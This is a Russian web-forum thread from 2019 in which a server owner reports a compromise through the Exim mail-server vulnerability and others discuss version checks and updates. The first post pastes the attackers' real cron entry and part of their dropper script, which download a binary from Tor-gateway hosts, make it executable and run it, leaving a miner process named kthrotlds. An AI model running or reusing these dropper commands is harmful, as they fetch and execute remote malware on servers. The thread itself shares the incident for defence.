Уязвимость очень высокого уровня в exim
Страницы: 1
Уязвимость очень высокого уровня в exim, Проверяем свои сервера и устанавливаем обновление срочно!
10 июня примерно в 2.52 по мск один мой сервер был взломан данным способом скрин 1 [url]https://prnt.sc/nzqmhf[/url] скрин 2 [url]https://prnt.sc/nzq1ta[/url]
Заметил, что сайт упал 502 ошибкой начал смотреть заметил потухшие службы (скрин 2) в процессах висело такое

Код
[CODE]  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
10543 root      20   0  430524   7636    652 S 399.3  0.0 256:26.18 [kthrotlds]
   42 root      rt   0       0      0      0 S   0.3  0.0   0:00.01 watchdog/7
29601 mysql     20   0 2281312 274392   5496 S   0.3  0.4   0:00.28 mysqld
в кроне такой код был

Код
tbin=$(command -v passwd); bpath=$(dirname "${tbin}"; curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi;  (${curl}  -fsSLk --connect-timeout 26 --max-time 75  https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /usr/local/bin/npt||${curl}  -fsSLk --connect-timeout 26 --max-time 75  https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /usr/local/bin/npt||${curl}  -fsSLk --connect-timeout 26 --max-time 75  https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /usr/local/bin/npt||${wget}  --quiet --no-check-certificate --connect-timeout=26 --timeout=75  https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /usr/local/bin/npt||${wget}  --quiet --no-check-certificate --connect-timeout=26 --timeout=75  https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /usr/local/bin/npt||${wget}  --quiet --no-check-certificate --connect-timeout=26 --timeout=75  https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O /usr/local/bin/npt) && chmod +x /usr/local/bin/npt && /bin/sh /usr/local/bin/npt

В данный момент собираю новый сервер на старом пока сайт висит с обрубленным кроном, что именно успели сделать пока выясняю и не лечил

Код
wget http://lechillka.firstvds.ru/exim_rce_fixer.sh && chmod +x exim_rce_fixer.sh && ./exim_rce_fixer.sh
 и не уверен что всё вылечит решил новый сервер собрать.

В созданных файлах можно найти такой код 

Код
#!/bin/bash

SPOOLDIR=/var/spool/exim

cd $SPOOLDIR/db
for a in retry misc wait-* callout ratelimit; do
    [ -r "$a" ] || continue
    [ "${a%%.lockfile}" = "$a" ] || continue
    /usr/sbin/exim_tidydb $SPOOLDIR $a >/dev/null
done
или такой

Код
#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
RHOST="https://an7kmd2wp4xo7hpr"
TOR1=".tor2web.su/"
TOR2=".tor2web.io/"
TOR3=".onion.sh/"
RPATH1='src/ldm'
#LPATH="${HOME-/tmp}/.cache/"
TIMEOUT="75"
CTIMEOUT="22"
COPTS=" -fsSLk --retry 2 --connect-timeout ${CTIMEOUT} --max-time ${TIMEOUT} "
WOPTS=" --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=${CTIMEOUT} --timeout=${TIMEOUT} "
tbin=$(command -v passwd); bpath=$(dirname "${tbin}"
curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi
wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q ".wgetrc'-style command" && wget="$f" && break; done; fi; fi
#CHKCURL='curl="curl "; wget="wget "; if [ "$(whoami)" = "root" ]; then if [ $(command -v curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); fi; if [ -z ${curl} ]; then curl="echo "; fi; if [ $(command -v wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi; if [ -z ${wget} ]; then wget="echo "; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; fi; '
CHKCURL='tbin=$(command -v passwd); bpath=$(dirname "${tbin}"; curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; '
LBIN8="kthrotlds"
null=' >/dev/null 2>&1'
sudoer=1
sudo=''
if [ "$(whoami)" != "root" ]; then
    sudo="sudo "
    timeout 1 sudo echo 'kthreadd' 2>/dev/null && sudoer=1||{ sudo=''; sudoer=0; }
.................Не помещается ))...............

Может кому пригодится.
Подробно описано здесь https://firstvds.ru/blog/uyazvimost-v-pochtovom-servere-exim
Рекомендую хостинг и VPN в Европе от 56р.
Рекомендую хостинг в России от 220р.
Мой Сайт-Блог Климов Дмитрий .
Тоже вчера от хостера письмо получил по этому поводу. Как вы думаете отключение этой службы решит проблему или обязательно обновляться?
Цитата
андрей ирмишин пишет:
Тоже вчера от хостера письмо получил по этому поводу. Как вы думаете отключение этой службы решит проблему или обязательно обновляться?
Я думаю лучше обновиться, или вообще удалить с сервера если не пользуетесь.
Сначала проверьте свою версию Exim:

Debian/Ubuntu:
dpkg --list |grep exim 
CentOS:
rpm -qa |grep exim
У многих до сих пор версия 4,86, которую обновлять не обязательно пока. Да и значит вас проблема не коснулась. Проблема у: 4.87 до 4.91.
Изменено: Александр - 13 Июня 2019 15:11
Спасибо за подсказку, у меня похожая проблема. Но пофиксил через Exim
Цитата
Qweniome Qweniome пишет:
Спасибо за подсказку, у меня похожая проблема. Но пофиксил через Exim
Спасибо, тоже через Exim починил.
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
01:12 Gambling Craft - гемблинг по белому 
21:48 Не работает Яндекс и Дзен 
21:33 В Google «бьют тревогу» из-за нового чат-бота ChatGPT 
21:32 SEO 2023: Яндекс раскрыл* главные факторы ранжирования (как занять ТОП ПС, получить много трафика и денег) 
20:26 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
10:54 "Яндекс" работает над отечественным аналогом нейросети ChatGPT 
01:04 Profitov.Partners — международная CPA-сеть 
17:26 Обмен/Ввод/Вывод криптовалют и электронных денег в разных странах 
16:12 Готовые аккаунты Яндекс Директ с пройденной модерацией, с отлежкой, трастовые 
12:52 Obama.ru - безопасный обмен криптовалют и электронных денежных средств 
12:12 Ural-obmen.ru — выгодный сервис обмена 
11:55 Размещение статей, ссылок и постовых на качественных ресурсах 
10:06 BestChange – обменивать электронную валюту можно быстро и выгодно 
09:25 Продам базу данных Банки/физы/пенсы/БАДы 
22:54 С юмором по жизни! 
22:47 Нейросеть для "создания" видео. Теперь и актёры не нужны? Google представила Dreamix 
21:24 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди 
21:22 Как ваш трафик, вчера-сегодня? 
22:22 Google разработал нейросеть MusicLM, которая генерирует музыку на основе текста 
18:32 Добро пожаловать в цифровой мир... 
22:25 Как получить рефералов и посетителей на сайт бесплатно.